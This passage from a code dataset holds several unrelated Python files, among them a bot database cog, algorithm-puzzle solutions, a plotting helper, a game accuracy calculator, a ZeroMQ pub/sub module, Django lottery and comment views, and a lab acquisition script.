self.redis_info.keys()\n\n if needed:\n log.error(\"please fully configure your Redis information in \"\n \"your configuration file. \"\n f\"missing keys: {', '.join(needed)}\")\n raise ValueError(\n \"Redis config. \"\n f\"missing keys: {', '.join(needed)}\"\n )\n\n dsn = constants.PSQL_INFO_STR.format(**self.db_info)\n\n self.bot._db_pool = await aiopg.create_pool(dsn)\n log.info(\"db connection established\")\n\n self.bot._db_Query = PostgreSQLQuery\n\n self.bot.redis_pool = await aioredis.create_redis_pool(\n (self.redis_info['host'], self.redis_info['port']),\n db=self.redis_info['db'],\n password=self.redis_info.get('password'),\n encoding='utf-8',\n )\n log.info(\"Redis connection established\")\n\n def __unload(self):\n self.bot.redis_pool.close()\n\n\nasync def _setup(bot: Bot):\n cog = DBManager(bot)\n await cog._init()\n log.info(\"adding DBManager cog\")\n bot.add_cog(cog)\n\n\ndef setup(bot: Bot):\n log.info(\"running db setup until complete\")\n bot.loop.run_until_complete(_setup(bot))\n\n\ndef teardown(bot: Bot):\n log.info(\"removing DBManager cog\")\n bot.remove_cog(DBManager.__name__)\n","repo_name":"AkiraSama/fresnel","sub_path":"fresnel/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71836049474","text":"from collections import Counter\nclass Solution(object):\n # Second Solution (Beats 30.03% of time)\n def findTheDifference(self, s1, s2):\n word1Count = Counter(s1)\n for ch in s2:\n if not ch in word1Count or word1Count[ch] <= 0: return ch\n else: word1Count[ch] -= 1\n\n return False\n\n # First Solution (Beats 6.03% of time)\n def findTheDifferenceFirst(self, s1, s2):\n word1Count = Counter(s1)\n word2Count = Counter(s2)\n result = list(word2Count - word1Count)\n print(result)\n return result[0]\n\n\ns = Solution()\nres = s.findTheDifference(\"abcd\", \"abcde\")\nprint(res)\n\ns.findTheDifference","repo_name":"codeAligned/codingChallenges","sub_path":"codewars/find_difference.py","file_name":"find_difference.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38558641885","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport warnings\n\ndef desc_stats(data): \n # Convert the dataset to a Pandas DataFrame\n Auto = pd.DataFrame(data)\n\n # Display a brief summary of the dataset\n print(Auto.info())\n\n # Glimpse the first few rows of the dataset\n print(Auto.head())\n\n # Summary of the numeric variables\n print(Auto.describe())\n \n return None\n\ndef box_visual(data):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sns.set_theme(style=\"ticks\", palette=\"pastel\")\n sns.boxplot(x=\"mpg\", y=\"weight\", palette=\"Blues\", data=data)\n plt.show()\n\ndef main():\n path = \"https://raw.githubusercontent.com/nogibjj/MiniProject9_Kelly_Tong/main/test_Auto.csv\"\n df = pd.read_csv(path)\n print(desc_stats(df))\n box_visual(df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nogibjj/MiniProject9_Kelly_Tong","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40926334024","text":"import string\nfrom typing import List, Tuple\n\n\ndef LinearizedTwoValues(val_1: float, val_2: float, vec_len: int) -> List[float]:\n \"\"\"create a list of values according to a given length where the values go up \n with the same step size from one given value to another.\n\n Args:\n val_1 (float): initial value\n val_2 (float): final value\n vec_len (int): length of new vector\n\n Returns:\n List[float]: A linear list of values\n \"\"\"\n vector_values = []\n diff = (val_2 - val_1)/vec_len\n\n for i in range(vec_len):\n val_new = val_1 + i * diff\n vector_values.append(val_new)\n\n return vector_values\n\n\ndef ExpandPath(path):\n path_new = []\n for dot in path:\n x_val = (dot[0] + 0.5) * 20\n y_val = (dot[1] + 1) * 20\n new_dot = [x_val, y_val]\n path_new.append(new_dot)\n return path_new\n\n\ndef folderName2Sections(folder_name: string):\n if folder_name == \"A_before\" or folder_name == \"csv_correction\":\n sections = [\"A\"]\n elif folder_name == \"A_after\":\n sections = [\"B\", \"C\", \"D\", \"E\"]\n elif folder_name == \"B_before\":\n sections = [\"A\", \"B\"]\n elif folder_name == \"B_after\":\n sections = [\"C\", \"D\", \"E\"]\n elif folder_name == \"C_before\":\n sections = [\"A\", \"B\", \"C\"]\n elif folder_name == \"C_after\":\n sections = [\"D\", \"E\"]\n elif folder_name == \"D_before\":\n sections = [\"A\", \"B\", \"C\", \"D\"]\n elif folder_name == \"D_after\":\n sections = [\"E\"]\n elif folder_name == \"full_path\":\n sections = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n\n return sections\n\n\ndef linearExperiments(val_1: float, val_2: float, resolution: float, section: string) -> List[float]:\n \"\"\"Create a linear list of values for the waypoints toward the goal.\n\n Args:\n val_1 (float): initial value\n val_2 (float): final value\n vec_len (int): length of new vector\n section (string): section of the path of the real world experiments\n\n Returns:\n List[float]: A linear list of values\n \"\"\"\n if section in {\"C\", \"E\"}:\n vec_len = round(resolution*1.5)\n else:\n vec_len = resolution\n\n return LinearizedTwoValues(val_1, val_2, vec_len)\n\n\ndef AECDDataLinear(path_exe_waypoints, file_name: string):\n path_exe = ExpandPath(path_exe_waypoints)\n resolution = 20 # TODO: change to true res\n sections = folderName2Sections(file_name)\n\n path_exe_linear = []\n for i in range(2):\n vec = []\n for j in range(len(sections)):\n vec = vec + linearExperiments(path_exe[j][i], path_exe[j+1][i],\n resolution, sections[j])\n path_exe_linear.append(vec)\n\n return path_exe_linear[0], path_exe_linear[1]\n\n\ndef VOADataExpanded(x_mean: List[float], y_mean: List[float], x_var: List[float], y_var: List[float]):\n x_new = []\n for x in x_mean:\n x_val = (x + 0.5) * 20\n x_new.append(x_val)\n x_mean = x_new\n\n y_new = []\n for y in y_mean:\n y_val = (y + 1) * 20\n y_new.append(y_val)\n y_mean = y_new\n\n x_var_new = []\n for x in x_var:\n x_val = x * 20\n x_var_new.append(x_val)\n x_var = x_var_new\n\n y_var_new = []\n for y in y_var:\n y_val = y * 20\n y_var_new.append(y_val)\n y_var = y_var_new\n\n return x_mean, y_mean, x_var, y_var\n\n\ndef VOADataExtractHelpAtI(i: int):\n x_mean, y_mean, x_var, y_var = VOADataRaw()\n x_mean, y_mean, x_var, y_var = VOADataExpanded(\n x_mean, y_mean, x_var, y_var)\n\n x_mean, y_mean, x_var_new, y_var_new = VOADataLinear(\n x_mean, y_mean, x_var, y_var)\n\n x_var_correction = x_var[i]\n y_var_correction = y_var[i]\n index_correction = x_var_new.index(x_var_correction)\n for j in range(len(x_var_new) - index_correction):\n x_var_new[j + index_correction] -= x_var_correction\n y_var_new[j + index_correction] -= y_var_correction\n\n return x_mean, y_mean, x_var_new, y_var_new\n\n\ndef VOADataLinear(x_mean: List[float], y_mean: List[float], x_var: List[float], y_var: List[float]):\n resolution = 20\n values = [x_mean, y_mean, x_var, y_var]\n\n values_linear = []\n for vec_value in values:\n vec_val_A = linearExperiments(\n vec_value[0], vec_value[1], resolution, \"A\")\n vec_val_B = linearExperiments(\n vec_value[1], vec_value[2], resolution, \"B\")\n vec_val_C = linearExperiments(\n vec_value[2], vec_value[3], resolution, \"C\")\n vec_val_D = linearExperiments(\n vec_value[3], vec_value[4], resolution, \"D\")\n vec_val_E = linearExperiments(\n vec_value[4], vec_value[5], resolution, \"E\")\n values_linear.append(vec_val_A + vec_val_B +\n vec_val_C + vec_val_D + vec_val_E)\n\n return values_linear[0], values_linear[1], values_linear[2], values_linear[3]\n\n\ndef VOADataRaw() -> Tuple[List[float], List[float], List[float], List[float]]:\n \"\"\"Data to calculate the VOA according to the location uncertainty of the agent\n\n Returns:\n Tuple[List[float], List[float], List[float], List[float]]: \n x_mean - location mean over the X axis\n y_mean - location mean over the Y axis\n x_sigma - location sigma over the X axis\n y_sigma - location sigma over the Y axis \n \"\"\"\n x_mean = [-0.028375, 0.954354167, 1.5180625,\n 2.389979167, 3.347729167, 4.1971875]\n y_mean = [0.000333333, 0.001625, 0.7801875, -\n 0.376895833, -0.3968125, 0.781916667]\n\n x_sigma = [0.000855785, 0.009477892, 0.022112197,\n 0.03022457, 0.028011764, 0.036931409]\n y_sigma = [0.000465215, 0.014023169, 0.022906405,\n 0.045606768, 0.071284017, 0.094513136]\n\n return x_mean, y_mean, x_sigma, y_sigma\n","repo_name":"CLAIR-LAB-TECHNION/VOA","sub_path":"code/experiments_data.py","file_name":"experiments_data.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30748600728","text":"import PySimpleGUI as sg\r\nimport sys\r\n\r\n# GUI setup\r\nlayout = [\r\n [sg.Text(\"Input desired accuracy and max 300s:\")],\r\n [sg.Text('Accuracy (to nearest hundredth): '), sg.Input(size=(10, 1))],\r\n [sg.Text('300s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('100s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('50s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('Miss: '), sg.Input(size=(10, 1))],\r\n [sg.OK(), sg.Exit()]\r\n]\r\nwindow = sg.Window('osu! Reverse Accuracy Calculator').Layout(layout)\r\n\r\n\r\ndef process(three):\r\n hundred, maximum = 0, three\r\n while True:\r\n testacc = round(((100 * hundred + 300 * three) /\r\n (300 * (hundred + three))) * 100, 2)\r\n if testacc <= acc:\r\n break\r\n three -= 1\r\n hundred += 1\r\n if maximum > three and testacc != acc:\r\n three += 1\r\n hundred -= 1\r\n testacc = round(((100 * hundred + 300 * three) /\r\n (300 * (hundred + three))) * 100, 2)\r\n sg.Popup(str(three) + \"/\" + str(hundred) + \"/0/0\" + \" for \" + str(acc) + \"% if FC (\" + str(testacc) + \"%)\")\r\n\r\n\r\nwhile True:\r\n while True:\r\n event, (acc, threehundred, onehundred, fifty, miss) = window.Read()\r\n if event is None or event == \"Exit\":\r\n sys.exit()\r\n try:\r\n acc, threehundred, onehundred, fifty, miss =\\\r\n float(acc), int(threehundred), int(onehundred), int(fifty), int(miss)\r\n threehundred = threehundred + onehundred + fifty + miss\r\n if 0 <= float(acc) <= 100:\r\n break\r\n else:\r\n sg.Popup(\"That is an invalid input.\")\r\n except ValueError:\r\n sg.Popup(\"ERROR\", \"That is an invalid input.\")\r\n process(threehundred)\r\n","repo_name":"SCRedstone/reverse-accuracy","sub_path":"osu! Reverse Accuracy Calculator.py","file_name":"osu! Reverse Accuracy Calculator.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23434100741","text":"import sys\r\ndef Nstrat(N,K):\r\n\tscoreN=0\r\n\tN_l = [x for x in N]\r\n\tK_l = [x for x in K]\r\n\twhile len(N_l)>0:\r\n\t\tif N_l[-1] > K_l[-1]:\r\n\t\t\tdel N_l[-1]\r\n\t\t\tdel K_l[0]\r\n\t\t\tscoreN = scoreN+1\r\n\t\telse:\r\n\t\t\tfor k in range(len(K_l)):\r\n\t\t\t\tif K_l[k] > N_l[-1]:\r\n\t\t\t\t\tdel K_l[k]\r\n\t\t\t\t\tbreak\r\n\t\t\tdel N_l[-1]\r\n\treturn scoreN\r\n\t\r\ndef Dstrat(N,K):\r\n\tscoreN=0\r\n\tN_l = [x for x in N]\r\n\tK_l = [x for x in K]\r\n\twhile len(N_l)>0:\r\n\t\tindex = None\r\n\t\tfor i in range(len(N_l)):\r\n\t\t\tif N_l[i] > K_l[0]:\r\n\t\t\t\tindex = i\r\n\t\t\t\tbreak\r\n\t\tif index != None:\r\n\t\t\tscoreN = scoreN+1\r\n\t\t\tdel N_l[index]\r\n\t\t\tdel K_l[0]\r\n\t\telse:\r\n\t\t\tdel N_l[0]\r\n\t\t\tdel K_l[0]\r\n\treturn scoreN\r\n\t\t\t\t\r\n\r\nsys.stdin = open('input.in','r')\r\nsys.stdout = open('output.out','w+')\r\n\t\t\t\t\r\nT = int(input())\r\nfor i in range(1,T+1):\r\n\tN = int(input())\r\n\tN = [float(x) for x in input().split()]\r\n\tK = [float(x) for x in input().split()]\r\n\tN.sort()\r\n\tK.sort()\r\n\tprint('Case #{CaseNo}: {Dct} {Nrm}'.format(CaseNo=i,Dct=Dstrat(N,K),Nrm=Nstrat(N,K)))\r\n\t\r\nsys.stdin = sys.__stdin__\r\nsys.stdout = sys.__stdout__\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1801.py","file_name":"1801.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21226772826","text":"srclst = [1,5,2,7,4,9]\r\n\r\ndef cal_num1_num2(sum,srclst):\r\n lst = []\r\n for i in range(len(srclst) - 1):\r\n x = srclst[i]\r\n for j in range(i + 1, len(srclst)):\r\n y = srclst[j]\r\n if sum == x + y:\r\n lst.append((x,y))\r\n\r\n return lst\r\n\r\nprint(cal_num1_num2(9,srclst))\r\n\r\n","repo_name":"magedus/python-11","sub_path":"quzhenji/week8/W8_calcu_twonum.py","file_name":"W8_calcu_twonum.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72565100354","text":"'''\n\nDescription:\n\nFind the sum of all left leaves in a given binary tree.\n\nExample:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nThere are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.\n\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def sumOfLeftLeaves(self, root: TreeNode) -> int:\n \n # ---------------------------\n def dfs(node, attr):\n \n if not node:\n \n # base case:\n # empty node or empty tree\n return 0\n \n \n if not node.left and not node.right:\n\n # base case:\n # current node is leaf node\n\n return node.val if attr == 'left' else 0\n\n \n # general case:\n return dfs(node.left, 'left') + dfs(node.right, 'right')\n \n # ---------------------------\n return dfs(node=root, attr='root')\n\n\n# n : the number of nodes in binary tree\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of DFS, which is of O( n )\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the storage for recursion call stack, which is of O( n )\n\n\nimport unittest\n\nclass Testing( unittest.TestCase ):\n\n def test_case_1( self ):\n \n root = TreeNode( 3 )\n\n root.left = TreeNode( 9 )\n root.right = TreeNode( 20 )\n\n root.right.left = TreeNode( 15 )\n root.right.right = TreeNode( 7 )\n\n result = Solution().sumOfLeftLeaves( root=root )\n self.assertEqual( result, 24 )\n\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"brianchiang-tw/leetcode","sub_path":"2020_August_Leetcode_30_days_challenge/Week_4_Sum of Left Leaves/by_reursion.py","file_name":"by_reursion.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"31394905445","text":"import threading\nimport queue\n\nimport zmq\n\nfrom babylog.logger import babylogger\nfrom babylog.deserialize import LoggedPrediction\n\n\nclass Publisher:\n def __init__(\n self, address: str, port: int, topic: str, context_io_threads: int = 1\n ):\n self._topic = topic\n self._context = zmq.Context(context_io_threads)\n try:\n self._publisher = zmq.Socket(self._context, zmq.PUB)\n self._publisher.bind(f\"tcp://{address}:{port}\")\n babylogger.info(\n f\"Publisher with topic ({topic}) succesfully binded to port {port}\"\n )\n except Exception as e:\n babylogger.error(f\"could not initialize publisher: {e}\")\n raise ValueError(f\"could not initialize publisher: {e}\")\n\n def send(self, data: bytes) -> bool:\n try:\n if self._publisher.send_string(self._topic, zmq.SNDMORE) is not None:\n babylogger.error(1)\n return False\n if self._publisher.send(data) is not None:\n babylogger.error(2)\n return False\n return True\n except Exception as e:\n babylogger.error(f\"exception while sending with publisher: {e}\")\n return False\n\n def shutdown(self):\n self._publisher.close()\n\n\nclass Subscriber:\n def __init__(\n self,\n address: str,\n port: int,\n topic: str,\n max_data_history: int = 10,\n context_io_threads: int = 1,\n ):\n self._topic = topic\n self._max_data_history = max_data_history\n self._shutdown = False\n\n self._context = zmq.Context(context_io_threads)\n self._subscriber = zmq.Socket(self._context, zmq.SUB)\n self._subscriber.setsockopt(zmq.RCVTIMEO, 1000)\n\n try:\n self._subscriber.connect(f\"tcp://{address}:{port}\")\n self._subscriber.setsockopt_string(zmq.SUBSCRIBE, topic)\n babylogger.info(\n f\"subscriber with topic ({topic}) successfully connected to port {port}\"\n )\n except Exception as e:\n babylogger.error(f\"could not setup subscriber: {e}\")\n raise\n self._mutex = threading.Lock()\n self._data = b\"\"\n self._data_queue = queue.Queue(maxsize=1000)\n threading.Thread(target=self.receive).start()\n\n def shutdown(self):\n babylogger.info(f\"shutting down {self._topic} stream.\")\n self._shutdown = True\n\n def receive(self):\n while not self._shutdown:\n try:\n if self._subscriber.poll(1000, zmq.POLLIN):\n recv_msgs = self._subscriber.recv_multipart()\n assert len(recv_msgs) == 2\n self._mutex.acquire()\n self._data = recv_msgs[1]\n self._data_queue.put(self._data)\n self._mutex.release()\n else:\n pass\n except Exception as e:\n babylogger.error(f\"could not receive message: {e}\")\n babylogger.info(f\"{self._topic} stream shut down\")\n\n @property\n def data(self):\n self._mutex.acquire()\n data = self._data\n self._mutex.release()\n\n return data\n\n @property\n def logged_data(self, max_timeout=1):\n try:\n data = self._data_queue.get(timeout=max_timeout)\n except Exception as e:\n babylogger.info(f\"could not get message: {e}\")\n return None\n return LoggedPrediction.from_bytes(data)\n","repo_name":"thebabylonai/babylog","sub_path":"python/src/babylog/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"61"} +{"seq_id":"37158155192","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse\nfrom app01 import models\nimport random\nimport datetime\n\n\ndef logout(request):\n request.session.clear()\n logout_json = {'session_delete': True}\n return JsonResponse(logout_json)\n\n\ndef login_check(request):\n res_json = [\n {\n \"res_success\": None,\n },\n {\n \"res_success\": True,\n },\n {\n \"res_success\": False,\n }\n ]\n # 接受ajax传过来的username,password,remember\n username = request.POST.get('username')\n password = request.POST.get('password')\n remember = request.POST.get('remember')\n if username == '' or password == '':\n return JsonResponse(res_json[0])\n # print(username)\n is_exist = models.User_info.objects.filter(user_account=username, user_password=password)\n # print(is_exist)\n if is_exist.exists():\n request.session['username'] = username\n request.session['password'] = password\n request.session['isLogin'] = True\n request.session.set_expiry(0)\n ret = JsonResponse(res_json[1])\n if remember == 'true':\n ret.set_cookie('username', username + '|' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n return ret\n else:\n return JsonResponse(res_json[2])\n\n\ndef delete_date(request):\n delete_id = request.POST.get('delete_id')\n models.User_info.objects.filter(user_id=delete_id).delete()\n date_is_delete = {'isdelete': True}\n return JsonResponse(date_is_delete)\n\n\ndef touch_prize(request):\n count = int(request.POST.get('count'))\n username = request.session.get('username')\n try:\n account = models.User_info.objects.get(user_account=username)\n except ObjectDoesNotExist:\n return JsonResponse({'success': False, 'log': '登录已过期,请重新登录'})\n if account.user_money < count * 100:\n return JsonResponse({'success': False, 'log': '点券不足,请充值'})\n '''\n 抽奖的算法\n 10连必出A\n 随机数(1-1000)\n 1-300是金币\n 301-500是砖石\n 501-700是改名卡\n 701-820 B英雄\n 821-900 B皮肤\n 901-930 A英雄\n 931-955 S英雄\n 956-975 A皮肤\n 976-990 S皮肤\n 991-1000 SSR 英雄\n '''\n prize = {}\n\n def one_prize():\n # 数组,10个,每个元素是一个字典,字典有id,name,rate键\n awards_rate = models.Lucky_award.objects.all()\n sum = 0\n random_num = random.randint(1, 1000)\n for ele in awards_rate:\n if ele.award_rate * 1000 + sum >= random_num >= sum:\n return ele.award_name\n sum += ele.award_rate * 1000\n\n if count == 10:\n for i in range(1, 11):\n prize[i] = one_prize()\n account.user_money = account.user_money - count * 100\n account.save()\n else:\n prize[1] = one_prize()\n account.user_money = account.user_money - count * 100\n account.save()\n # 抽完奖需要把物品保存到个人物品\n # prize抽奖字典,account 账户信息\n for award in prize.values():\n store = models.User_stores.objects.get(user_name=account.user_id,\n store_name=models.Lucky_award.objects.get(award_name=award).award_id)\n store.store_num = store.store_num + 1\n store.save()\n return JsonResponse({'success': True, 'user_money': account.user_money, 'prize': prize})\n\n\ndef danmu_send(request):\n # 弹幕值\n userId = models.User_info.objects.get(user_account=request.session.get('username'))\n if not userId:\n return JsonResponse({'res_success': False})\n danmu_value = request.GET.get('danmu_value')\n # 服务器时间\n danmu_time = (datetime.datetime.now() + datetime.timedelta(seconds=5)).strftime(\"%Y-%m-%d %H:%M:%S\") # 服务器时间\n is_success = models.Danmu.objects.create(\n user_id=userId,\n danmu_name=danmu_value,\n danmu_time=danmu_time\n )\n if is_success:\n return JsonResponse({'res_success': True})\n\n\ndef get_danmu(request):\n try:\n models.User_info.objects.get(user_account=request.session.get('username'))\n except ObjectDoesNotExist:\n return JsonResponse({'message': False})\n get_time = request.GET.get('get_time')\n # get_time = '2022-01-27 16:01:28'\n # print('获取时间为',get_time,'的弹幕')\n # 外键名称__母表字段\n list_danmu = list(models.Danmu.objects.filter(danmu_time=get_time).values('user_id__user_name', 'danmu_name'))\n return JsonResponse({'message': True, 'content': list_danmu})\n","repo_name":"zhengyc-debug/zhengyc_private_repository","sub_path":"django_project/app01/ajax_views.py","file_name":"ajax_views.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36476955731","text":"#!/bin/env/python\n#! -*- coding: utf-8 -*-\n\n###################\n## General imports ##\n###################\n\nfrom matplotlib.pyplot import plot, xlabel, ylabel, axis, hist, figure, show, axis, subplots, xlim, ylim, title, semilogx, legend, savefig \nfrom mpl_toolkits.mplot3d import axes3d, Axes3D \nimport numpy\nimport itertools\nimport os\n\n###################\n## Options ##\n###################\n\ntest = False \nruntime_debug = False\nsave_data = True\nload_data = False\nshort_experiment = False\nverbose = False\naquisition = True \nsave_scripts = True if aquisition else False\n\nif (os.environ['USERNAME']=='dphy-reuletlab') :\n python_2_7_scripts_root = \"C:\\\\Projets\\\\Time_Domain_Optic\\\\Python_2_7\"\nelse :# (os.environ['USERNAME']=='Sous-sol') :\n python_2_7_scripts_root = \"C:\\\\Users\\Sous-sol\\\\Desktop\\\\CODES\\\\Python_2_7\"\nos.chdir(python_2_7_scripts_root) \n\nexp_dir = 'Default'\n\n# this as to be a list of tuple to preserve order\npyhegel_tools_local_dependencies = [\n ('SII_aCorr' , '..\\\\SII_aCorr\\\\Pyhegel_tools_local.py'),\n]\n\n#########################################################\n## Set current dit / path and / initialize save folder ##\n#########################################################\n\nfrom Scripts_utitilities import *\nscripts,paths = set_exp_environment(python_2_7_scripts_root,exp_dir=exp_dir,test=test)\n\nif aquisition : make_dir( paths['saves'] ) # Tell to pyhegel to make the saves directory and to save data there. This is pyhegel specific cannot put into module ... \n\nscripts.update(pyhegel_tools_local_dependencies)\n\n###################\n## Custom imports ##\n###################\n\nfrom General_tools import *\nfrom Experiment import * \nfrom Experiment_helper import *\n\n# C++ bindings\n# if aquisition : from acorrs_otf import * \n# if aquisition : from time_quadratures import * \n# if aquisition : from histograms import * \n# if aquisition : from special_functions import * \n\n########################\n## LOAD PYHEGEL TOOLS ##\n########################\n\"\"\" \nPyhegel functions and virtual instruments(depend on plotting functions)\n\"\"\"\nexecfile(paths['pyhegel_wrappers']) # TODO convert to module\nfor k,_ in pyhegel_tools_local_dependencies : # I dont think this can be done in a function ?\n execfile(scripts[k])\nexecfile(scripts['pyhegel_tools_local']) \n\n#################\n## SCRIPT COPY ##\n#################\n\"\"\"\n Save all script into paths['saves']\n\"\"\"\nif save_scripts : save_all_scripts(paths,scripts)\n\n#############################\n## EXPERIMENTAL PARAMETERS ##\n#############################\n\n# execfile(scripts['parameters']) # Is this necessary anymore ?\n\n# Kernels params\nl_kernel = (1<<8) + 1 \n\n# Acquisition params\ndt = 0.03125 \n\n# Guzik params\ngain_dB = 9.0\n\n# SWEEP PARAMETERS\n\nif short_experiment :\n Vdc = r_[linspace(0.1,1.2,3)[:-1],linspace(1.2,4,3)]\nelse :\n Vdc = r_[linspace(0.1,1.2,6)[:-1],linspace(1.2,4,5)]\n\noptions = {'test':test,'verbose':verbose}\n\nif not load_data :\n device_options = {'debug':runtime_debug}\n yoko = Yoko_wrapper(**device_options)\n conditions = (n_measures,Vdc,)\n devices = (yoko,) \n SII_mes = SII_aCorr(conditions,devices,**options)\n SII_mes.measure()\n SII_mes.update_analysis()\n if save_data : SII_mes.save_data(paths['saves'])\n \n data = SII_mes.get_data_dict()\n SII_anal = SII_anal(conditions,data,**options)\n SII_anal.update_analysis()\n if save_data : SII_anal.save_data(paths['saves'])\nelse :\n data_folder = paths['pwd'] +'\\\\20-11-13_10h27' if not(test) else paths['experiments_root'] +'\\\\TEST'\n filename = 'data_20-11-16_09h26.npz'\n SII_anal = SII_anal.load_data(data_folder,filename)\n\n","repo_name":"SimonBolducBeaudoin/Experiement_libs","sub_path":"0-Aquisition_template.py","file_name":"0-Aquisition_template.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36893572105","text":"from .base import BaseExcelWriter\n\n\nclass UsersToExcel(BaseExcelWriter):\n EXCLUDE_FIELDS = (\n \"verification_code\",\n \"telegram_id\",\n \"telegram_chat_id\",\n \"ethereum_wallet\",\n \"btc_wallet\",\n \"simba_wallet\",\n \"password\",\n \"user_eth_addresses\",\n \"user_btc_addresses\",\n \"secret_2fa\",\n \"signed_addresses\",\n \"recover_code\",\n )\n\n def _prepare_addresses(self):\n for row in self.data:\n for field in (\"user_eth_addresses\", \"user_btc_addresses\"):\n for i, val in enumerate(row.get(field, [])):\n row[f\"{field}/{i + 1}\"] = val.get(\"address\")\n\n return\n\n def proceed(self):\n self._prepare_addresses()\n\n x = 1\n y = 0\n for user in self.data:\n y = self._write_header(list(user.keys()), x=0, y=y, level=0, exclude_keys=self.EXCLUDE_FIELDS)\n self._write_row(user, x, level=0, exclude_keys=self.EXCLUDE_FIELDS)\n x += 1\n\n self.wb.close()\n return self.output.getvalue()\n","repo_name":"amosov00/simba","sub_path":"backend/core/mechanics/excel/export_users.py","file_name":"export_users.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1639723432","text":"from typing import List\n\n\nclass Solution:\n def findKthPositive(self, arr, k):\n beg, end = 0, len(arr)\n while beg < end:\n mid = (beg + end) // 2\n if arr[mid] - mid - 1 < k:\n beg = mid + 1\n else:\n end = mid\n return end + k\n\n\nif __name__ == '__main__':\n arr = [2, 3, 4, 7, 11]\n k = 5\n print(Solution().findKthPositive(arr, k))\n","repo_name":"amogchandrashekar/Leetcode","sub_path":"Easy/Kth Missing Positive Number.py","file_name":"Kth Missing Positive Number.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33740238561","text":"import tkinter as tk\nfrom tkinter.ttk import Notebook, Frame\n\nfrom application_gui.detection_view import DetectionFrame\nfrom application_gui.evaluation_view import EvaluationFrame\nfrom application_gui.train_spm_view import TrainSpmFrame\nfrom application_gui.train_texture_view import TrainTextureFrame\n\n\nclass EvaluatorApplication(Frame):\n def __init__(self, parent):\n Frame.__init__(self, parent)\n self.create_windows()\n\n def create_windows(self):\n notebook = Notebook(self.master)\n\n tab_evaluation = Frame(notebook)\n notebook.add(tab_evaluation, text=\"Evaluator\")\n EvaluationFrame(tab_evaluation)\n\n tab_train_spm = Frame(notebook)\n notebook.add(tab_train_spm, text=\"Train SPM\")\n TrainSpmFrame(tab_train_spm)\n\n tab_train_texture = Frame(notebook)\n notebook.add(tab_train_texture, text=\"Train texture\")\n TrainTextureFrame(tab_train_texture)\n\n tab_detection = Frame(notebook)\n notebook.add(tab_detection, text=\"Detection\")\n DetectionFrame(tab_detection)\n\n notebook.pack(expand=1, fill=\"both\")\n\n\nif __name__ == '__main__':\n win = tk.Tk()\n EvaluatorApplication(win)\n win.mainloop()\n","repo_name":"StefanSebastian/SkinDetectionInImages","sub_path":"implementation/application_gui/main_view.py","file_name":"main_view.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1351376952","text":"from morpcc.crud.model import CollectionUI, ModelUI\n\n\nclass ApplicationModelUI(ModelUI):\n pass\n\n\nclass BehaviorableApplicationModelUI(ApplicationModelUI):\n def __new__(cls, request, model, collection):\n behaviors = model.behaviors()\n if not behaviors:\n return ApplicationModelUI(request, model, collection)\n\n markers = [behavior.modelui_marker for behavior in behaviors]\n markers.append(ApplicationModelUI)\n klass = type(\n \"ApplicationModelUI\", tuple(markers), {\"__path_model__\": ApplicationModelUI}\n )\n return klass(request, model, collection)\n\n\nclass ApplicationCollectionUI(CollectionUI):\n modelui_class = BehaviorableApplicationModelUI\n\n columns = [\n {\"title\": \"Title\", \"name\": \"title\"},\n {\"title\": \"Description\", \"name\": \"description\"},\n {\"title\": \"Actions\", \"name\": \"structure:buttons\"},\n 